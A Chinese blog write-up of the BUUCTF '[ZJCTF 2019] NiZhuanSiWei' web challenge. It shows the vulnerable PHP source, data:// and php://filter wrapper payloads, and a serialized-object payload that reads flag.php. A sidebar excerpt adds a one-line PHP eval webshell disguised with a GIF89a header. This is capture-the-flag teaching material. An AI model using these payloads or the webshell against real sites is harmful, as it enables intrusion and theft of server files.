BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解

最新推荐文章于 2024-03-19 20:41:25 发布
最新推荐文章于 2024-03-19 20:41:25 发布
阅读量1.8k 收藏 7
点赞数 7
分类专栏: BUU做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/107150182
版权

前言

  • 又是一天。

读题

  • 打开题目,直接给源码
 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

  • 看到有include文件包含,必然是解题的重点,所以先看第一个if,必须先满足它。

  • text不为空,且 file_get_contents() 读取的返回值为 welcome to the zjctf

  • file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。

  • 而如果直接给text赋值 text=welcome to the zjctf 的话,没有回显说明没成功。

  • 所以需要用方法绕过它,两种方法

    • php://input伪协议

      • 此协议需要 allow_url_include 为 on ,可以访问请求的原始数据的只读流, 将post请求中的数据作为 PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为 php://input ,同时post想设置的文件内容,php执行时会将post内容当作文件内容。
      • 好像用 HackBar 因为在 post 中没有设置变量不能访问,所以用bp抓包。
      • 看到有回显,可行。
        在这里插入图片描述

    • data://伪协议

      • data://协议需要满足双on条件,作用和 php://input 类似
        在这里插入图片描述

      • 也可以加上 base64 编码。
        在这里插入图片描述

  • 再看第二个if file不能有flag字符。没啥,往下看。

  • 提示了有一个 useless.php ,想到之前说的PHP伪协议中的php://filter读取文件。尝试。

    php://filter/read=convert.base64-encode/resource=useless.php

  • 所以构造payload,成功回显。

    ?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

    在这里插入图片描述

  • base64解码,成功得到 useless.php 源码。

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>
  • 看到有一个 flag.php ,并且file不为空将读取flag.php并显示。所以。构造一个序列化字符串。
<?php  

class Flag{  //flag.php  
    public $file=flag.php;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  

$a = new Flag();
$a->file="flag.php";
echo serialize($a);

  • 找个在线运行PHP的网站,得到

      O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

  • 最后综合payload

    ?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

  • 这里发现如果file继续用前面伪协议读取的话,后面的 password 会无回显无法得到flag 。需修改为 useless.php。

最后

  • 这题就是利用了PHP伪协议来解题,灵活运用。

  • 附上题目链接

  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。

  • 最后欢迎来访个人博客

风过江南乱
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
acm.rar_浙江大学 ACM 题解
09-24
这是网上看到的ACM题解,浙江大学网站上的东西,大家可以看看 学习下
CTF实战训练日志——2021-10-14(一)
热门推荐
stybill的博客
10-14 4万+
题目:PHP代码审计 结果提交类型:GJCTF{*********} 分析 is_numeric()函数判断是否为数字,所有num的输入不能是数字 在if($num==1)中,要求num的值要为1 所以,只需要num=1’ 后面跟一个 ’ 就行 构造URL http://www.czlgjbbq.top/GJCTF/number_question.php/?num=1’ ...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4135
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
BUUCTF—Crypto(完结版本—_—)
最新发布
2301_76768121的博客
03-19 1115
BUUCTF-部分Crypto wp
BugkuCTF平台-Web题目笔记
qq_28865787的博客
03-11 612
先从简单的下手,慢慢学习,不断更新~ Web2 查看页面源码,就找到了,嗯,真的好简单。 计算器 还是先查看源码。 &amp;amp;amp;amp;amp;amp;lt;input class=&amp;amp;amp;amp;amp;quot;input&amp;amp;amp;amp;amp;quot; type=&amp;amp;amp;amp;amp;quot;text&amp;amp;amp;amp;amp;quot; maxlength=&am
CTF练习题[WEB]-矛盾
weixin_45246254的博客
09-29 1668
https://ctf.bugku.com/challenges/detail/id/72.html 拿到题目如下 尝试?num=1,无果 分析代码 $num=$_GET['num'];//传入num参数 if(!is_numeric($num))//如果num不是整数 { echo $num;//打印num if($num==1)//如果num等于1,打印flag echo 'flag{**********}'; } 确实是个矛盾,num不是整数还得等于1 继续尝试?num=true,思路对了,至少
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1109
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
leetcode题解_leetcode_leetcode题解_
09-29
leetcode题解 算法和数据结构题目及解答
树链剖分_题解_
10-03
树链剖分,luoguP3384 【模板】重链剖分
历年题_CCF题解_
10-04
CCF题目解答
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
通用语言程序员面试,leet部分题目详细解答
GIF89a
weixin_59392781的博客
09-15 1885
GIF89a <script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 304
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
1.leve1-[本地复现]-[析构方法的利用]
qwsn
12-26 2114
文章目录PHP反序列化漏洞leve1-[析构方法的利用]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 leve1-[析构方法的利用] 1.题目描述 <?php include "flag.php"; class Connection { public $file; public function __construct($file) { $this->file = $file; } public function
【CTF系列】攻防世界-nizhuansiwei
读万卷书,行万里路。
03-02 516
文章目录1 file_get_content2 include3 反序列化 相关信息: hint:无 进入网站后,便能显示源码,是一道代码审计题目。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; // text 需要等于 welcome if(isset($text)&&(file_get_contents($text,'r')==="welcome to
2.level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]
qwsn
12-26 1862
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level2-[本地复现]-[越过wakeup]-[CVE-2016-7124] 1.题目描述 <?php include "flag.php"; class Connection { public $file; public fun
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2461
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3873
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
BUUCTF——phpweb
weixin_45864041的博客
04-17 591
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值